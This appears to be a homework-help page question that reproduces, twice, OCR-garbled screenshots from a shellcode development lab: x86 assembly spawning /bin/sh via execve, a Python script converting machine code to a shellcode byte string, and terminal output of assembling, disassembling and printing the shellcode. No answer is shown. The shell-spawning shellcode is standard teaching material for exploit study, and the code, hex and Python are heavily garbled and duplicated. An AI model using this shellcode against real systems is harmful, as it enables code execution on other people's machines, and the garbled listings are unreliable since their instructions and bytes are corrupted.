Question

1 Approved Answer

Posted on Sep 30, 2024

write explaination for each command Listing 1: A basic shellcode example mysh.s section text global_start start: i Store the argument string on stack eax, eax

write explaination for each command

Listing 1: A basic shellcode example mysh.s section text global_start start: i Store the argument string on stack eax, eax push eax ; Use o to terminate the string push "//sh" ; push bin" MOV ebx, esp Get the string address 0 ; Construct the argument array argvul push eax ; argv11 0 push ebx ; argol points to the cud string * MOV ecx, esp ; Get the address of argu For environment Variable xor edx, edx No en variable o Invoke exedve () XOT Baxy X 3x000000gga moy ay 0x0b BAX 0x00000 int 0x80 Listing 2: convert.py #!/usr/bin/env python3 Run "xxd-p-c 20 mysh.o", and copy and paste the machine code part to the following: ori_sh - 31db31c0b0d5cd80 310050682f2 7368682862696e89e3505389e131 d231c0boobcd80 ### sh- ori_sh.replace("n", "") # length = int(len (sh)/2) print ("Length of the shellcode: .format (length) shellcodes ( '! for 1 in range (length): 5+"\\x" t sh[211+ sh(2.1+1] if i >0 and 116 15: An' + ").encode that in print (s) Paragraph s Styles Terminal [02/17/21] seed@VM:-$ cd Downloads [02/17/21] seed@VM:-/Downloads$ ls convert.py mysh.s myshlo.s Shellcode-Development-Lab-main Shellcode-Development -Lab-main.zip nasm [02/17/21] seed@VM:-/Downloads$ nasm of elf32 mysh.s - 0 The program 'nasm' is currently not installed. You can install it by typing: sudo apt install nasm [02/17/21] seed@VM:-/Downloads$ sudo apt install nasm Reading package lists... Done Building dependency tree Reading state information... Done The following NEW packages will be installed : o upgraded, 1 newly installed, e to remove and 3 not upgraded. Need to get 1,520 kB of archives. After this operation, 3,982 kB of additional disk space will be used. Get:1 http://us.archive.ubuntu.com/ubuntu xenial/universe i386 nasm 1386 2.11.08 -1 [1,520 kB) Fetched 1,520 kB in 10s (146 kB/s) Selecting previously unselected package nasm. (Reading database 215092 files and directories currently installed.) Preparing to unpack ...asm_2.11.08-1_1386.deb ... Unpacking nasm (2.11.08-1) Processing triggers for man-db (2.7.5-1) Processing triggers for install-info (6.1.0.dfsg.1-5) Processing triggers for doc-base (0.10.7) Processing 1 added doc-base file... Registering documents with scrollkeeper... Setting up nasm (2.11.08-1) .. ... ... [02/17/21] seed@VM:-/Downloads $ nasm of elf32 mysh.s .0 mysh2.0 [02/17/21]seed@VM:-/Downloads [02/17/21) seed@VM:-/Downloads $ ld -m elf_1386 mysh2.0 -o mysh2 [02/17/21] seed@VM:-/Downloads [02/17/21] seed@VM:-/Downloads $ echo $$ 4242 [02/17/21] seed@VM:-/Downloads [02/17/21]seed@VM :-/Downloads$ mysh2 $ echo $$ 5014 $ [02/17/21) seed@VM:-$ cd Downloads (02/17/21] seed@VM:-/Downloads$ objdump - Mintel --disassemble mysh2.o mysh2.0: file format elf32-1386 Disassembly of section .text: 00000000 <_start>: 0: 31 cm 2: 50 3: 68 2f 2f 73 68 8: 68 2f 62 69 6e 89 e3 f: 50 10: 53 89 el 13: 31 d2 31 co 17: b d: xor push push push mov push push mov xor xor mov eax, eax eax 0x68732f2f Ox6e69622f ebx, esp eax ebx ecx, esp edx, edx eax, eax al, oxb 11: 15: [ 2/17/21]seed@: -/Downloads$ xxd -p - c 20 mysh2 .0 7f454c466161013 1 3428052 1 111b 3 3121 112 63 1193 a1f 31c050682f2f7368 682f62696e89e3505389e131d231c0b00bcd8 2e74657874002e7368737472746162 o2e7379667461622e737472746162 4fff3 86d7973 682e735f7374617274 SEEDubuntu (Running] - Oracle VM VirtualBox ile Machine View Input Devices Help onvert.py (-/Downloads) - gedit Open #!/usr/bin/python3 s # Run "xxd -p-c 20 rev_sh.o", # copy and paste the machine code to the following: ori sh = "h 310050682127368 6B2F62696e89e3505389e1310231coboobed8000 00000000002e74657874002e7368737472746162 092e737960746162092e737472746162 + sh = ori_sh.replace(" ","") length int(len(sh)/2) print("Length of the shellcode: 0)".format(length)) s 'shellcode= (n for i in range(length): s += "\\x + sh[244] + sh[2*1+1] if i > 0 and 1 % 16 = 15: S + 5+=+") encode('latin-1')" print(s) [02/17/21] seed@VM:-/Downloads$ ./convert.py Length of the shellcode: 64 shellcode= ( "\x31\x20\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\x43\x50" "\x53\x89\xe1\x31\xd2\x31\x20\xb0\x0b\xcd\x80\x00\x00\x00\x00\x00" "\x00\x2e\x74\x65\x78\x74\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62" "\x00\x2e\x73\x79\x6d\x74\x61\x62\x00\x2e\x73\x74\x72\x74\x61\x62" ).encode('latin-1') [02/17/21] seed@VM:-/Downloads$ I Listing 1: A basic shellcode example mysh.s section text global_start start: i Store the argument string on stack eax, eax push eax ; Use o to terminate the string push "//sh" ; push bin" MOV ebx, esp Get the string address 0 ; Construct the argument array argvul push eax ; argv11 0 push ebx ; argol points to the cud string * MOV ecx, esp ; Get the address of argu For environment Variable xor edx, edx No en variable o Invoke exedve () XOT Baxy X 3x000000gga moy ay 0x0b BAX 0x00000 int 0x80 Listing 2: convert.py #!/usr/bin/env python3 Run "xxd-p-c 20 mysh.o", and copy and paste the machine code part to the following: ori_sh - 31db31c0b0d5cd80 310050682f2 7368682862696e89e3505389e131 d231c0boobcd80 ### sh- ori_sh.replace("n", "") # length = int(len (sh)/2) print ("Length of the shellcode: .format (length) shellcodes ( '! for 1 in range (length): 5+"\\x" t sh[211+ sh(2.1+1] if i >0 and 116 15: An' + ").encode that in print (s) Paragraph s Styles Terminal [02/17/21] seed@VM:-$ cd Downloads [02/17/21] seed@VM:-/Downloads$ ls convert.py mysh.s myshlo.s Shellcode-Development-Lab-main Shellcode-Development -Lab-main.zip nasm [02/17/21] seed@VM:-/Downloads$ nasm of elf32 mysh.s - 0 The program 'nasm' is currently not installed. You can install it by typing: sudo apt install nasm [02/17/21] seed@VM:-/Downloads$ sudo apt install nasm Reading package lists... Done Building dependency tree Reading state information... Done The following NEW packages will be installed : o upgraded, 1 newly installed, e to remove and 3 not upgraded. Need to get 1,520 kB of archives. After this operation, 3,982 kB of additional disk space will be used. Get:1 http://us.archive.ubuntu.com/ubuntu xenial/universe i386 nasm 1386 2.11.08 -1 [1,520 kB) Fetched 1,520 kB in 10s (146 kB/s) Selecting previously unselected package nasm. (Reading database 215092 files and directories currently installed.) Preparing to unpack ...asm_2.11.08-1_1386.deb ... Unpacking nasm (2.11.08-1) Processing triggers for man-db (2.7.5-1) Processing triggers for install-info (6.1.0.dfsg.1-5) Processing triggers for doc-base (0.10.7) Processing 1 added doc-base file... Registering documents with scrollkeeper... Setting up nasm (2.11.08-1) .. ... ... [02/17/21] seed@VM:-/Downloads $ nasm of elf32 mysh.s .0 mysh2.0 [02/17/21]seed@VM:-/Downloads [02/17/21) seed@VM:-/Downloads $ ld -m elf_1386 mysh2.0 -o mysh2 [02/17/21] seed@VM:-/Downloads [02/17/21] seed@VM:-/Downloads $ echo $$ 4242 [02/17/21] seed@VM:-/Downloads [02/17/21]seed@VM :-/Downloads$ mysh2 $ echo $$ 5014 $ [02/17/21) seed@VM:-$ cd Downloads (02/17/21] seed@VM:-/Downloads$ objdump - Mintel --disassemble mysh2.o mysh2.0: file format elf32-1386 Disassembly of section .text: 00000000 <_start>: 0: 31 cm 2: 50 3: 68 2f 2f 73 68 8: 68 2f 62 69 6e 89 e3 f: 50 10: 53 89 el 13: 31 d2 31 co 17: b d: xor push push push mov push push mov xor xor mov eax, eax eax 0x68732f2f Ox6e69622f ebx, esp eax ebx ecx, esp edx, edx eax, eax al, oxb 11: 15: [ 2/17/21]seed@: -/Downloads$ xxd -p - c 20 mysh2 .0 7f454c466161013 1 3428052 1 111b 3 3121 112 63 1193 a1f 31c050682f2f7368 682f62696e89e3505389e131d231c0b00bcd8 2e74657874002e7368737472746162 o2e7379667461622e737472746162 4fff3 86d7973 682e735f7374617274 SEEDubuntu (Running] - Oracle VM VirtualBox ile Machine View Input Devices Help onvert.py (-/Downloads) - gedit Open #!/usr/bin/python3 s # Run "xxd -p-c 20 rev_sh.o", # copy and paste the machine code to the following: ori sh = "h 310050682127368 6B2F62696e89e3505389e1310231coboobed8000 00000000002e74657874002e7368737472746162 092e737960746162092e737472746162 + sh = ori_sh.replace(" ","") length int(len(sh)/2) print("Length of the shellcode: 0)".format(length)) s 'shellcode= (n for i in range(length): s += "\\x + sh[244] + sh[2*1+1] if i > 0 and 1 % 16 = 15: S + 5+=+") encode('latin-1')" print(s) [02/17/21] seed@VM:-/Downloads$ ./convert.py Length of the shellcode: 64 shellcode= ( "\x31\x20\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\x43\x50" "\x53\x89\xe1\x31\xd2\x31\x20\xb0\x0b\xcd\x80\x00\x00\x00\x00\x00" "\x00\x2e\x74\x65\x78\x74\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62" "\x00\x2e\x73\x79\x6d\x74\x61\x62\x00\x2e\x73\x74\x72\x74\x61\x62" ).encode('latin-1') [02/17/21] seed@VM:-/Downloads$